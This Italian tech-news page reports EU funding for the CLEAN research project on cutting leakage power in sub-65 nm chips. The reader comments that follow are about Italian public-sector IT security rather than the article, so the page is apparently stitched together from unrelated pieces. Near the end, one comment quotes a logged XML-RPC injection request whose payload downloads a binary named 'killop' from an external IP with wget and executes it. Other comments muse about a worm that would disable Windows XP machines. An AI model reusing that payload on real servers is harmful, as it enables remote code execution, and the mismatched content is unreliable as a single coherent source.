Processori a risparmio energetico nella UE

La Commissione Europea ha deciso di finanziare con 4,5 milioni di euro un progetto di ricerca che permetta di individuare nuove soluzioni tecnologiche per il risparmio energetico dei PC


Roma – Il risparmio energetico è diventato una priorità per l’Europa, ancora di più se riguarda lo sviluppo nel settore ICT. La Commissione Europea ha deciso di elargire un cospicuo finanziamento per il progetto ” C ontrolling Le akage power in N anoCMOS SoCs” (Clean), che coinvolge numerosi produttori del comparto semi-conduttori, ed enti di ricerca comunitari – compreso il Politecnico di Torino.

I 4,5 milioni di euro del sovvenzionamento verranno spesi per individuare nuove soluzioni “al silicio” in grado di contenere i consumi energetici dell’hardware PC. Gli obiettivi non si limitano alla sola ingegnerizzazione di prodotti ma comprendono anche l’implementazione di metodologie, tecniche e strumenti che possano ri-disegnare gli elementi dei chip.

Gli esperti sono convinti che si possa ancora fare molto per limitare la dispersione energetica fra i transistor integrati nei chip. Un problema che sarà sempre più degno di interesse con l’avvento delle nuove soluzioni sub-65 nm, caratterizzate da una densità di transistor superiore al passato.

“Il progetto darà un contributo sostanziale allo sviluppo della nuova generazione di processori con costruzione a 65 nm – e inferiore. E nello specifico al contenimento della dispersione energetica”, ha dichiarato il responsabile di “Clean” Roberto Zafalon, manager del comparto Ricerca e Sviluppo di ST Microelectronics . “I nostri risultati permetteranno non solo di diminuire i consumi delle unità nano-elettriche, ma anche di migliorare l’ingegnerizzazione dei prodotti finali”.

Intel , lo scorso novembre, aveva ammesso che la nuova generazione di processori a 65 nm si era dimostrata inutilizzabile sui terminali mobili proprio a causa della notevole dispersione energetica – capace di assorbire in pochi minuti la disponibilità di una normale batteria. Allo stesso tempo, secondo analisi di laboratorio fornite sempre da Intel, un comune PC desktop disperderebbe “senza motivo” almeno il 25% della sua energia.

Per far fronte a questo problema, da anni, le aziende stanno cercando di individuare soluzioni compatibili con le esigenze di mercato. Lo scorso ottobre IBM ha presentato la sua nuova linea server a basso consumo, così come ha promesso di fare Sun Microsytems il mese seguente. Insomma, se da una parte alcuni produttori sembrano disinteressarsi della questione, come ad esempio quelli specializzati nello sviluppo di schede video, altri dispongono già di una roadmap per il “low-consume”. Clean, come dice il nome stesso, tenterà di fare pulizia e supportare le imprese che sono più sensibili al risparmio energetico, nonché alle politiche di salvaguardia ambientale.

Dario d’Elia

La tua email sarà utilizzata per comunicarti se qualcuno risponde al tuo commento e non sarà pubblicato. Dichiari di avere preso visione e di accettare quanto previsto dalla informativa privacy

  • Anonimo scrive:
    La sicurezza non vende
    Qui in Italia chi fa sicurezza informaticaviene considerato alla stregua di sfigato smanettone.Questa cosa invece è perfettamente normale negli altri stati europei dove per inciso svolgo consulenza assessment security e penetration test ai principali gruppi statali.yeahhh :D .
  • Anonimo scrive:
    Non cambierà mai nulla
    L'unico modo per rendere un sistema e una struttura sicura è che ogni singolo utente abbia coscienza dei rischi legati all'utilizzo di un computer.Si possono mettere su firewall, antivirus e tutto quanto dovrebbe essere considerato come la base della sicurezza. Ma fin quando esiste anche solo un utente privo delle basilari conoscenze di sicurezza informatica si rischierà sempre. E, purtroppo, questa è la parte più difficile da realizzare.Ed è soprattutto la parte che le aziende non vogliono sentire (come costi soprattutto).Inutile creare policy di sicurezza incasinatissime quando poi la password di administrator è alla portata di tutti.Inutile avere regole ferree sul firewall "internet" quando all'interno non esiste nulla di simile per la "intranet".Ecc, ecc, ecc. La sicurezza in Italia non esiste (ma anche nel resto del mondo non sta troppo bene).
    • Anonimo scrive:
      Re: Non cambierà mai nulla
      - Scritto da: Anonimo
      L'unico modo per rendere un sistema e una
      struttura sicura è che ogni singolo utente abbia
      coscienza dei rischi legati all'utilizzo di un
      computer.
      Si possono mettere su firewall, antivirus e tutto
      quanto dovrebbe essere considerato come la base
      della sicurezza. Ma fin quando esiste anche solo
      un utente privo delle basilari conoscenze di
      sicurezza informatica si rischierà sempre. E,
      purtroppo, questa è la parte più difficile da
      realizzare.
      Ed è soprattutto la parte che le aziende non
      vogliono sentire (come costi soprattutto).
      Inutile creare policy di sicurezza
      incasinatissime quando poi la password di
      administrator è alla portata di tutti.
      Inutile avere regole ferree sul firewall
      "internet" quando all'interno non esiste nulla di
      simile per la "intranet".
      Ecc, ecc, ecc.
      La sicurezza in Italia non esiste (ma anche nel
      resto del mondo non sta troppo bene).Non solo non esiste, ma è anche percepita come qualcosa di inutile e dispendioso.Pensa solo al fatto che molte aziende ad esempio disabilitano gli aggiornamenti automatici, perché appesantiscono la rete e i PC (stranamente dopo tot aggiornamenti i PC tendono a diventare lenti e appesantiti), e si tengono PC colabrodo, salvo poi riformattare lo stesso ogni sei mesi, perché se non sono le patch di sicurezza ad appesantire il PC, ci pensa quel sottobosco di virus/worm/spyware vario che così trova terreno fertile.Mediocrità ed incompetenza tecnica ad ogni livella, fanno dell'IT italiana, quello che è oggi sotto gli occhi di tutti.
  • Anonimo scrive:
    il rimedio c'e'
    basta usare eComStation per non essere piu' vulnerabilia virus, worm, spyware e rootkit
    • Alessandrox scrive:
      Re: il rimedio c'e'
      - Scritto da: Anonimo
      basta usare eComStation per non essere piu'
      vulnerabili
      a virus, worm, spyware e rootkitAllora meglio Linux, almeno non dovro' impazzire perche' non trovo quel programma che mi serve e che normalmente tutti (gli altri) usano.Per carita' ottimo sistema ma il problema sono sempre le applicazioni.
      • Anonimo scrive:
        Re: il rimedio c'e'
        se sai usare GCC e conosci un po' di C++ te li ricompilida tei vari programmi open-source per linux...come gia' tanti utenti di eCS sono abituati a fare, purtroppo o per fortuna, non so..
        • AnyFile scrive:
          Re: il rimedio c'e'
          In genere basta fare ./configuremake make install(cosa che in genere e' piu' facile che passare dalle schermate dei vari installer windows)
          • Anonimo scrive:
            Re: il rimedio c'e'
            - Scritto da: AnyFile
            In genere basta fare
            ./configure
            make
            make installOh mio Dio! Usare la TASTIERA!!! Chiedi davvero troppo...
          • AnyFile scrive:
            Re: il rimedio c'e'
            - Scritto da: Anonimo

            - Scritto da: AnyFile

            In genere basta fare

            ./configure

            make

            make install

            Oh mio Dio! Usare la TASTIERA!!! Chiedi davvero
            troppo...Beh ... ci satra' sicuramente qualche tool grafico che fa la stesssa cosa ... dal momento che io appartengo alla minoranza che usa quasi piu' la tastiera del mouse ... non mi sono mai posto il problema
          • Alessandrox scrive:
            Re: il rimedio c'e'
            - Scritto da: AnyFile
            In genere basta fare
            ./configure
            make
            make install

            (cosa che in genere e' piu' facile che passare
            dalle schermate dei vari installer windows)Si se hai i sorgenti e se ci sai rimettere le mani: secondo te per portare Firefox su OS/2 basta dare una ricompilatina ai sorgenti originali x linux? Non importa che mi rispondi dato che la risposta e' ovvia e banale.
        • Alessandrox scrive:
          Re: il rimedio c'e'
          - Scritto da: Anonimo
          se sai usare GCC e conosci un po' di C++ te li
          ricompili
          da tei vari programmi open-source per linux...

          come gia' tanti utenti di eCS sono abituati a
          fare,
          purtroppo o per fortuna, non so..Guarda che io eCs e OS/2 (oltre a Linux) li uso tutti i giorni...da quale versione di firefox credi stia scrivendo....?:-))Per caso frequenti it.comp.os.os2 ?
  • Anonimo scrive:
    Ma chi sara' mai...
    ...sto CNIPA....
  • Anonimo scrive:
    siamo italiani
    ... e l'illegalità è parte del nostro DNA.E' ovvio che in Italia non c'è sicurezza! Altrimenti nessuno potrebbe più fare come gli pare!Non avete fatto caso che quei politici collusi in scandali economici e i vari "furbetti del quartierino" in realtà non sono altro che hacker? Non fanno hacking tecnologico, ma fanno cmq hacking, per chi, visto che questi personaggi sono il Potere, perchè il Potere deve mettersi i bastoni tra le ruote?Saluti.
    • Anonimo scrive:
      Re: siamo italiani
      - Scritto da: Anonimo
      ... e l'illegalità è parte del nostro DNA.
      E' ovvio che in Italia non c'è sicurezza!
      Altrimenti nessuno potrebbe più fare come gli
      pare!

      Non avete fatto caso che quei politici collusi in
      scandali economici e i vari "furbetti del
      quartierino" in realtà non sono altro che hacker?
      Non fanno hacking tecnologico, ma fanno cmq
      hacking, per chi, visto che questi personaggi
      sono il Potere, perchè il Potere deve mettersi i
      bastoni tra le ruote?

      Saluti.

      madooooooooo che PALLE, ma possibile che nel 2006 dopo che ANCHE albano ha lasciato ROMINA stiamo ancora alla visione giornalistica di HACKING ?quello di cui parli tu e' CRACKING.
      • Anonimo scrive:
        Re: siamo italiani

        madooooooooo che PALLE, ma possibile che nel 2006
        dopo che ANCHE albano ha lasciato ROMINA stiamo
        ancora alla visione giornalistica di HACKING ?
        quello di cui parli tu e' CRACKING.che è una branca dell'hacking...
    • Alessandrox scrive:
      Re: siamo italiani
      - Scritto da: Anonimo
      ... e l'illegalità è parte del nostro DNA.
      E' ovvio che in Italia non c'è sicurezza!
      Altrimenti nessuno potrebbe più fare come gli
      pare!Questo e' un luogo comune banalmente falso
      • Anonimo scrive:
        Re: siamo italiani

        Questo e' un luogo comune banalmente falsoma tu dove vivi? sulla luna? dentro un PC?La tua è la giustificazione che voi italiani usate per pararvi il fondo schiena... oppure è hacking?
        • Alessandrox scrive:
          Re: siamo italiani
          - Scritto da: Anonimo

          Questo e' un luogo comune banalmente falso
          ma tu dove vivi? sulla luna? dentro un PC?
          La tua è la giustificazione che voi italiani
          usate per pararvi il fondo schiena...
          oppure è hacking?Sbagli.... dovevi scrivere "Tu Italiano"... se hai coraggio, ma da coniglio quale sei spari nel mucchio sperando di avere un po' di ragione.POi ti rammento della truffa di una cordata di banche Inglesi, francesi e tedesche ai danni della banca d' italia di qualche mese fa', tanto per dirne unaTutto il mondo e' paese, tuttavia altrove le truffe si fanno con maggio stile questo te lo concedo. E' vero che gli Italiani sono per lo piu' molto individualisti con tutte le conseguernze del caso ma dire che sono i meno onesti e' una falsita'. O meglio.... bisognerebbe fare delle distizioni: ci sono regioni e paesi in cui purtroppo l' illegalita' e la truffa sono diffuse ma queste zone non sono "Tutta l' italia".
  • Anonimo scrive:
    informatizzazione delle PPAA?
    MADDOVE?Ma se per fare una carta da nulla in comune ci vogliono 88 timbri, 45 firme, 37 moduli, 12 pause caffé, 31 "mi ripete cosa le serve?", 62 errori ortografici...
    • Anonimo scrive:
      Re: informatizzazione delle PPAA?
      - Scritto da: Anonimo
      MADDOVE?

      Ma se per fare una carta da nulla in comune ci
      vogliono 88 timbri, 45 firme, 37 moduli, 12 pause
      caffé, 31 "mi ripete cosa le serve?", 62 errori
      ortografici...

      hai dimenticato 10 grattatine al cavallo dei pantaloni!puffa
      • AnyFile scrive:
        Re: informatizzazione delle PPAA?
        - Scritto da: Anonimo

        - Scritto da: Anonimo

        MADDOVE?



        Ma se per fare una carta da nulla in comune ci

        vogliono 88 timbri, 45 firme, 37 moduli, 12
        pause

        caffé, 31 "mi ripete cosa le serve?", 62 errori

        ortografici...






        hai dimenticato 10 grattatine al cavallo dei
        pantaloni!


        puffae ha dimenticato che evi essere fortunato che quel giorno sia l'impiegato sia il dirigente sia presente e non impeganti in qualche riunione in qualche amena localita' turistica
  • bit01 scrive:
    Ve lo dico io il pericolo dov'è... (bis)
    http://punto-informatico.it/forum/pol.asp?mid=1207353&tid=1207353&p=1&r=PI
    • Anonimo scrive:
      Re: Ve lo dico io il pericolo dov'è... (
      - Scritto da: bit01

      http://punto-informatico.it/forum/pol.asp?mid=1207In effetti, il rischio alla sicurezza è tutto un quiz!
      • Anonimo scrive:
        Re: Ve lo dico io il pericolo dov'è... (
        - Scritto da: Anonimo

        - Scritto da: bit01




        http://punto-informatico.it/forum/pol.asp?mid=1207


        In effetti, il rischio alla sicurezza è tutto un
        quiz!
        un famoso detto del settore[riguardante il social engineering] è:"Se cammini velocemente con una cartelletta sotto il braccio e con l'aria preoccupata puoi entrare in qualsiasi posto"ovviamente non sempre funziona, ma nel 95% dei casi, si ha via libera......e vi assicuro, nessuno baderà a voi...
        • AnyFile scrive:
          Re: Ve lo dico io il pericolo dov'è... (
          Io so di chi ha fatto la prova a presentarsi in universita' e riuscire a portare via una decina di computer senza essere fermati da nessuno: tutti pensavano che fossero quelli dell'assistenza ....
    • Anonimo scrive:
      Re: Ve lo dico io il pericolo dov'è... (
      - Scritto da: bit01

      http://punto-informatico.it/forum/pol.asp?mid=1207Sono d'accordo, i pericoli maggiori vengono da ignoranza e pigrizia, se poi questi difetti sono ambedue presenti ecco pronta una bella mina vagante, cui sarebbe davvero un peccato non zombizzare il PC.
  • Anonimo scrive:
    Impossibile
    Come? L'Italia è indietro su qualcosa? Impossibile, è una balla
  • Anonimo scrive:
    itsec nella pa
    non dico che i documenti cnipa siano redatti male, (anche se non si capisce perchè non continuare con l'aipa la cui unica differenza era non essere sotto il controllo diretto del ministero), ma le pa sono per la maggior parte posti in cui ciascuno fa quel che vuole sul suo pc, (a parte chi non lo sa usare chiama l'assistenza anche per sapere qual'é il tasto del maiuscolo) ci installa la peggio roba presa da internet e sulle riviste e aggiorna software e so con copie pirata salvo poi chiamare il ced quando non va più nulla, i dirigenti lasciano fare per il quieto vivere e per le procedure centralizzate incaricano ditte esterne solo per poter attribuire a queste la responsabilità quando le cose vanno male, per cui i ced della pa si riempiono di gente demotivata il cui unico ruolo é quello di formattare qualche pc e cambiare qualche toner nelle stampanti e molti ci sguazzano pure dato che altro non saprebbero fare e di aggiornarsi non hanno vogliala qualità del servizio nella pa (ict sec o altro che sia) non si raggiunge esternalizzando, riducendo il personale e mettendo i managers del proprio schieramento al posto di quelli dello schieramento altrui ma introducendo delle procedure per il controllo dei flussi, degli iter, delle mansioni (e non i controlli di qualità standard ISO che in contesto operativo di base introducono solo burocrazia e confusione)senza questa premessa, la vedo dura
    • Anonimo scrive:
      Re: itsec nella pa
      Riguardo all'esternalizzazione ho dei dubbi, finchè non assumeranno un po' di gente fresca sulla base di una selezione reale, se non esternalizzano buttano solo più quattrini
      • Anonimo scrive:
        Re: itsec nella pa

        Riguardo all'esternalizzazione ho dei dubbi,
        finchè non assumeranno un po' di gente fresca
        sulla base di una selezione reale, se non
        esternalizzano buttano solo più quattriniBravo hai centrato il problema! L'obbiettivo del rapporto è solo quello di creare nuovi posti di STIPENDIO!!!!E io pago :D
        • Anonimo scrive:
          Re: itsec nella pa
          - Scritto da: Anonimo

          Riguardo all'esternalizzazione ho dei dubbi,

          finchè non assumeranno un po' di gente fresca

          sulla base di una selezione reale, se non

          esternalizzano buttano solo più quattrini
          Bravo hai centrato il problema! L'obbiettivo del
          rapporto è solo quello di creare nuovi posti di
          STIPENDIO!!!!
          E io pago :D sapete che spessissimo i costi per le esternalizzazioni sono pari se non superiori a quelli del personale, solo che sono iscritti in diverse voci di bilancio ? non si tratta di abbatterli ma nasconderli sotto il tappeto, anche a non metter in dubbio la buona fede di chi li propugna, spesso in contatto con le ditte esterneavete provato a far richiedere al vs ufficio legale l'adempimento urgente di una clausola contrattuale con risultati apprezzabili ?vi siete resi conto che le ditte esternalizzanti basano la loro attività per lo più su dei ragazzi (la cui competenza spesso non é superiore a quella interna) a cui danno stipendi bassi , poche garanzie e nulla formazione?in pratica con le esternalizzazioni paghi lo stesso per un servizio spesso peggiore solo che i soldi delle tue tasse pagano i lussi ai manager delle ditte dell'outsorcing e gli stenti ai loro dipendentise hai tempo leggiti i dietrofront sull'outsorcing (fatti da ditte anche fortune 500) su slashdot e siti analoghi
          • AnyFile scrive:
            Re: itsec nella pa
            - Scritto da: Anonimo
            sapete che spessissimo i costi per le
            esternalizzazioni sono pari se non superiori a
            quelli del personale, solo che sono iscritti in
            diverse voci di bilancio ? non si tratta di
            abbatterli ma nasconderli sotto il tappeto, anche
            a non metter in dubbio la buona fede di chi li
            propugna, spesso in contatto con le ditte esterneQuesto e' poco ma sicuro .. affidae ad aziende esterne costa molto di piu' ... anche perche' a quaesto punto nei costi vi e' anche tutta la burocrazia per la scelta (si fa per dire) della ditta esterna, poi questa ditta ha una sua burocratizzazione e costi amministrativi, ecc.pagare una persona (nel senso di assumerla) per fare un certo lavoro, molto spesso costerebbe molto meno.Si guardi ad esempio il caso delle caselle di posta elettronca negli uffici giudiziari. Pagano decine di euro al mese per una casella di posta elettronica ...... assurdo ....
    • Anonimo scrive:
      Re: itsec nella pa
      mi sa che abbiamo lavorato insieme noi due :p condivido pienamente.
  • Anonimo scrive:
    Non per nulla...
    L'italia vanta un buon livello nella classifica di utilizzatori di sistemi windows, si vedono i risultati.
    • Anonimo scrive:
      Re: Non per nulla...

      buon livello nella classifica veroprima nella % di uso windows rispetto allapopolazioneprima nella % di pirateria del suddetto windowsinfine prima nell'ignoranza generalizzata inquesto settore e non solo
      • matcion scrive:
        Re: Non per nulla...
        - Scritto da: Anonimo

        buon livello nella classifica

        vero
        prima nella % di uso windows rispetto alla
        popolazione
        prima nella % di pirateria del suddetto windows
        infine prima nell'ignoranza generalizzata in
        questo settore e non soloDove si possono vedere queste classifiche? Non sono riuscito a trovarle!
        • Anonimo scrive:
          Re: Non per nulla...
          - Scritto da: matcion

          - Scritto da: Anonimo


          buon livello nella classifica



          vero

          prima nella % di uso windows rispetto alla

          popolazione

          prima nella % di pirateria del suddetto windows

          infine prima nell'ignoranza generalizzata in

          questo settore e non solo

          Dove si possono vedere queste classifiche? Non
          sono riuscito a trovarle!sul corriere dei piccoli
  • Anonimo scrive:
    Ma se hanno violato qualsiasi sistema...
    che senso ha? alzare la sicurezza, strozate.cosi' si fottono i soldi e basta.se aggiorni il sw che usi e stai un po' attento alle configurazioni hai gia' un sistema difficile da attaccare.poi per i dati importanti basta fare un pc offline e basta.voi cosa ne pensate?
    • Anonimo scrive:
      Re: Ma se hanno violato qualsiasi sistem
      - Scritto da: Anonimo
      voi cosa ne pensate?meglio che non te lo dico
      • Anonimo scrive:
        Re: Ma se hanno violato qualsiasi sistem
        - Scritto da: Anonimo

        - Scritto da: Anonimo


        voi cosa ne pensate?

        meglio che non te lo dicogia' moooolto meglio se no fioccherebbero gli insulti.che gente :D
    • Anonimo scrive:
      Re: Ma se hanno violato qualsiasi sistem
      si, certo. si sta parlando di infrastrutture informatiche governative. basta un pc offline :rotfl:
    • Anonimo scrive:
      Re: Ma se hanno violato qualsiasi sistem
      - Scritto da: Anonimo
      che senso ha? alzare la sicurezza, strozate.
      cosi' si fottono i soldi e basta.
      se aggiorni il sw che usi e stai un po' attento
      alle configurazioni hai gia' un sistema difficile
      da attaccare.

      poi per i dati importanti basta fare un pc
      offline e basta.

      voi cosa ne pensate?Che ad essere off-line è il tuo cervello a mononeurone
    • Anonimo scrive:
      Re: Ma se hanno violato qualsiasi sistem
      - Scritto da: Anonimo

      voi cosa ne pensate?che il vero problema della (in)sicurezza è che la gestione di importanti risorse informatiche è in mano a gente che ha il tuo stesso bagaglio di conoscenze
    • Anonimo scrive:
      Re: Ma se hanno violato qualsiasi sistem
      ...che lavori alle Poste Italiote ;-)
    • mda scrive:
      Re: Ma se hanno violato qualsiasi sistem
      - Scritto da: Anonimo
      che senso ha? alzare la sicurezza, strozate.
      cosi' si fottono i soldi e basta.
      se aggiorni il sw che usi e stai un po' attento
      alle configurazioni hai gia' un sistema difficile
      da attaccare.

      poi per i dati importanti basta fare un pc
      offline e basta.

      voi cosa ne pensate?Si vede che NON ha mai curato la sicurezza informatica, sei addirittura totalmente ignorante in materia.Conviene informarti meglio insomma.Ciao
    • Anonimo scrive:
      Re: Ma se hanno violato qualsiasi sistem
      Già, perchè al pentagono non ci hanno pensato pure loro?
    • Anonimo scrive:
      Re: Ma se hanno violato qualsiasi sistem

      poi per i dati importanti basta fare un pc
      offline e basta.caxxo! ovvio!!!perchè non c'ho pensato prima??? era così logico!"capooooooooooooooo!!! gho trovà el modo par fermare gli attacchiiii! basta stacare el comuter da internet!""se, bravo 'mbecille, come fo a vardare i pornazi da stacà?""mmm...vero anca queo..."...no, mi sa che sto sistema non funziona...altri dotti consigli sull'argomento? :D :D (rotfl)(rotfl)
  • Anonimo scrive:
    Mi sono sempre chiesto...
    A proposito di pandemia sui PC, mi sono sempre chiesto cosa accadrebbe se si diffondesse un virus, che non immediatamente, ma in sincrono ad una certa data stabilita, reimpostasse su tutti i PC con su Windows XP, il famoso seriale FCKWG-...., quello che per intenderci si poteva usare prima della SP1 e che è stato immesso nella black-list da MS, rendendolo inutilizzabile (e rendendo inutilizzabile il PC che lo usa con un SP1 o 2)?Qualcosa del genere sarebbe peggio di qualunque nimda, codered, sober o altro mai visto prima, perché rendendo i PC inutilizzabili e inaccessibili (se non tramite appositi strumenti) costringerebbe ad un immane formattone di massa lasciando il mondo (informatico) praticamente vuoto (fatta eccezione per quei pochi linari e macachi che appestano la rete).Sarà quello il "doom's day"?Purtroppo questi sono i rischi dell'aver affidato tutto nelle mani di uno solo.Certo dopo una catastrofe del genere TCPA e Palladium, verranno accolti come i nuovi salvatori del mondo (sempre quello informatico), un po' come la guerra al terrorismo internazionale è stata vista da molti come necessaria per la nostra sicurezza dopo l'11 settembre del 2001.A pensar male si fa peccato, ma quasi sempre ci si azzecca.
    • Anonimo scrive:
      Re: Mi sono sempre chiesto...
      Perché doom's day? Con quel seriale ci si vive benissimo :D :D :D
    • Anonimo scrive:
      Re: Mi sono sempre chiesto...
      - Scritto da: Anonimo
      A proposito di pandemia sui PC, mi sono sempre
      chiesto cosa accadrebbe se si diffondesse un
      virus, che non immediatamente, ma in sincrono ad
      una certa data stabilita, reimpostasse su tutti i
      PC con su Windows XP, il famoso seriale
      FCKWG-...., quello che per intenderci si poteva
      usare prima della SP1 e che è stato immesso nella
      black-list da MS, rendendolo inutilizzabile (e
      rendendo inutilizzabile il PC che lo usa con un
      SP1 o 2)?

      Qualcosa del genere sarebbe peggio di qualunque
      nimda, codered, sober o altro mai visto prima,
      perché rendendo i PC inutilizzabili e
      inaccessibili (se non tramite appositi strumenti)
      costringerebbe ad un immane formattone di massa
      lasciando il mondo (informatico) praticamente
      vuoto (fatta eccezione per quei pochi linari e
      macachi che appestano la rete).
      Sarà quello il "doom's day"?

      Purtroppo questi sono i rischi dell'aver affidato
      tutto nelle mani di uno solo.
      Certo dopo una catastrofe del genere TCPA e
      Palladium, verranno accolti come i nuovi
      salvatori del mondo (sempre quello informatico),
      un po' come la guerra al terrorismo
      internazionale è stata vista da molti come
      necessaria per la nostra sicurezza dopo l'11
      settembre del 2001.

      A pensar male si fa peccato, ma quasi sempre ci
      si azzecca.Complimenti, hai dato un'ottima idea ai creatori di virus/worm/trojan. :)
      • Anonimo scrive:
        Re: Mi sono sempre chiesto...
        Dall'alto della mia Suse 9.0, senza antivirus me ne fott allegramente :D
        • Anonimo scrive:
          Re: Mi sono sempre chiesto...
          Dal basso del mio OS X, vi guardo e sorrido pensando a quanto la "beata ignoranza" faccia vivere felici .... :P
      • mda scrive:
        Re: Mi sono sempre chiesto...
        - Scritto da: Anonimo


        - Scritto da: Anonimo

        A proposito di pandemia sui PC, mi sono sempre

        chiesto cosa accadrebbe se si diffondesse un

        virus, che non immediatamente, ma in sincrono ad

        una certa data stabilita, reimpostasse su tutti
        i

        PC con su Windows XP, il famoso seriale

        FCKWG-...., quello che per intenderci si poteva

        usare prima della SP1 e che è stato immesso
        nella

        black-list da MS, rendendolo inutilizzabile (e

        rendendo inutilizzabile il PC che lo usa con un

        SP1 o 2)?



        Qualcosa del genere sarebbe peggio di qualunque

        nimda, codered, sober o altro mai visto prima,

        perché rendendo i PC inutilizzabili e

        inaccessibili (se non tramite appositi
        strumenti)

        costringerebbe ad un immane formattone di massa

        lasciando il mondo (informatico) praticamente

        vuoto (fatta eccezione per quei pochi linari e

        macachi che appestano la rete).

        Sarà quello il "doom's day"?



        Purtroppo questi sono i rischi dell'aver
        affidato

        tutto nelle mani di uno solo.

        Certo dopo una catastrofe del genere TCPA e

        Palladium, verranno accolti come i nuovi

        salvatori del mondo (sempre quello informatico),

        un po' come la guerra al terrorismo

        internazionale è stata vista da molti come

        necessaria per la nostra sicurezza dopo l'11

        settembre del 2001.



        A pensar male si fa peccato, ma quasi sempre ci

        si azzecca.

        Complimenti, hai dato un'ottima idea ai creatori
        di virus/worm/trojan. :)Ottima idea, adesso la polizia postale se accade una cosa del genere ti romperà le @@Ciao
  • Anonimo scrive:
    hahhahaha
    ma quale sicurezza il sistema ICT Italiano è una vaccata pazzesca.con mezzora sono in grado di sbuciare i sistemi informatici del ministero degli interniyeahhh :D .
    • Anonimo scrive:
      Re: hahhahaha
      E allora cosa aspetti?
    • Anonimo scrive:
      Re: hahhahaha
      eh eh...vorrei proprio vederti....missà che sei uno di quei 12enni che non sa neanche aggiornare i driver della scheda video...e fa il galletto..."20 minuti e entro alla nasa, 5 minuti e ti sproteggo di qua, 2 minuti e mezzo e ti formatto il pc da messenger..." ma per favore!! Buffone!
    • Anonimo scrive:
      Re: hahhahaha
      - Scritto da: Anonimo
      ma quale sicurezza il sistema ICT Italiano è una
      vaccata pazzesca.
      con mezzora sono in grado di sbuciare i sistemi
      informatici del ministero degli interni
      yeahhh :D .Ecco bravo inizia a cacare verdegli Interni sono pieni di honeypot
      • Anonimo scrive:
        Re: hahhahaha
        probabilmente non sa nemmeno cosa sia una honeypot ^_^
        • Anonimo scrive:
          Re: hahhahaha
          - Scritto da: Anonimo
          probabilmente non sa nemmeno cosa sia una
          honeypot ^_^...IMHO e' un "furbone" che cade al primo sugarcane che incontra... ;)
      • Anonimo scrive:
        Re: hahhahaha
        - Scritto da: Anonimo

        - Scritto da: Anonimo

        ma quale sicurezza il sistema ICT Italiano è una

        vaccata pazzesca.

        con mezzora sono in grado di sbuciare i sistemi

        informatici del ministero degli interni

        yeahhh :D .

        Ecco bravo inizia a cacare verde
        gli Interni sono pieni di honeypothoneypot? ma di che ca**o parlate??? ma voi ste cose le avete solo lette o siete in grado di farle??perchè pure io vedo i pornazzi di Rocco ma certe cose non le so fare (pur parlandone quotidianamente!!!)
        • Anonimo scrive:
          Re: hahhahaha
          - Scritto da: Anonimo
          honeypot? ma di che ca**o parlate??? ma voi ste
          cose le avete solo lette o siete in grado di
          farle??Moltissimi CED utilizzano gli honeypots io personalmente ne ho curato un paio fino l'anno scorso mi ha permesso di scovare una rete di botnet di una crew brasiliana ma sopratutto ho utilizzato le loro stesse armi per aumentare il grado di sicurezza delle mie macchine....senza contare gli script lamers che utilizzano pergiocare sulla chat o gli 0day bugs.....
  • Anonimo scrive:
    5 --
    il ns paese
  • Anonimo scrive:
    IL male è in Winzozz
    E' lui il responsabile di tutto ciò. Le PA farebbero bene ad emigrare a piattaforme più sicure come Linux, e abbondonare quella ciofeca di Wincess. Virus, patch in ritardo e zombie che si diffondono a macchia d'olio, a chi vogliamo imputare almeno il 90% delle responsabilità?
    • Anonimo scrive:
      Re: IL male è in Winzozz
      Il male è nell'ignoranza non in winzozz. Con certi utenti neppure la sicurezza di unix è sufficiente a garantire una livello di sicurezza decente
      • Anonimo scrive:
        Re: IL male è in Winzozz
        vero ... e l'ignoranza e la poca scafatezzza , e parla un linuxiano convinto ;-)
      • Anonimo scrive:
        inaffidabilita+disinformazione=microsoft

        Il male è nell'ignoranza non in winzozz. Con
        certi utenti neppure la sicurezza di unix è
        sufficiente a garantire una livello di sicurezza
        decentesbagliatissimo !il male è in chi produce prodotti colabrodoe, per piazzare la fetecchia a tutti, fa ilmarketing fuffoso e truffaldino dicomputer=tostapane, fregandosenealtamente di una corretta informazionesui comportamenti orientati alla sicurezzanonche in chi giustifica questo andazzoperchè ha un interesse a farloSI FANNO PRODOTTI SCHIFOSILI SI VENDE DICENDO CHE BASTASPINGERE UN BOTTONEQuesto è il risultato finale: milioni di personecon computer verminati, danni incalcolabiliche paghiamo tutti.C'è però chi sostiene questo "modello" disviluppo nonostante tutto: gli "informatici"italioti, quelli che scroccano il cinquantonealla zia camilla per sverminargli il puter, una volta al mese. Questa è la onoratacategoria professionale che slurpa eslinguazza i magnifici prodotti di mr gatescosa che la dice lunga sul panoramanostrano che dipende dall'incultura e dall'ignoranza generalizzata in tutti isettori.
    • Anonimo scrive:
      Re: IL male è in Winzozz
      - Scritto da: Anonimo
      E' lui il responsabile di tutto ciò. Le PA
      farebbero bene ad emigrare a piattaforme più
      sicure come Linux, e abbondonare quella ciofeca
      di Wincess. Virus, patch in ritardo e zombie che
      si diffondono a macchia d'olio, a chi vogliamo
      imputare almeno il 90% delle responsabilità?Allora la vogliamo fare la lista di servizi apri pista ai virus ?1) servizio di ripristino configurazione di sistema o chiamatelo pure " ripristino virus nel sistema !" :D 2) condivisione desktop remoto netmeeting3) il servizio relativo al plug and play universali4) servizio di registro remoto fatevi una ricerca in rete e ne trovete delle belle ! :p
      • Anonimo scrive:
        Re: IL male è in Winzozz
        questo un server linux xmlrpc bacato (ce ne sono cosi' tanti che google ha dovuto chiudere alla 10ima pagina la ricerca x il termine php e similari) :POST /xmlsrv/xmlrpc.php HTTP/1.1Host: 81.81.83.84User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)Content-Type: text/xmlContent-Length: 269mod_security-message: Access denied with code 406. Pattern match "" atPOST_PAYLOADmod_security-action: 406269test.method ',''));echo '_begin_';echo `cd /tmp;wget 216.55.168.25/killop;chmod +x killop;./killop `;echo '_end_';exit;/*
        • Anonimo scrive:
          Re: IL male è in Winzozz
          - Scritto da: Anonimo
          questo un server linux xmlrpc bacato (ce ne sono
          cosi' tanti che google ha dovuto chiudere alla
          10ima pagina la ricerca x il termine php e
          similari) :

          POST /xmlsrv/xmlrpc.php HTTP/1.1
          Host: 81.81.83.84
          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;
          Windows NT 5.1;)
          Content-Type: text/xml
          Content-Length: 269
          mod_security-message: Access denied with code
          406. Pattern match "" at
          POST_PAYLOAD
          mod_security-action: 406

          269
          test.method ram
          ',''));echo '_begin_';echo `cd /tmp;wget
          216.55.168.25/killop;c
          hmod +x killop;./killop `;echo
          '_end_';exit;/* arams
          Ecco un lamer.
          • Anonimo scrive:
            9 --
          • Anonimo scrive:
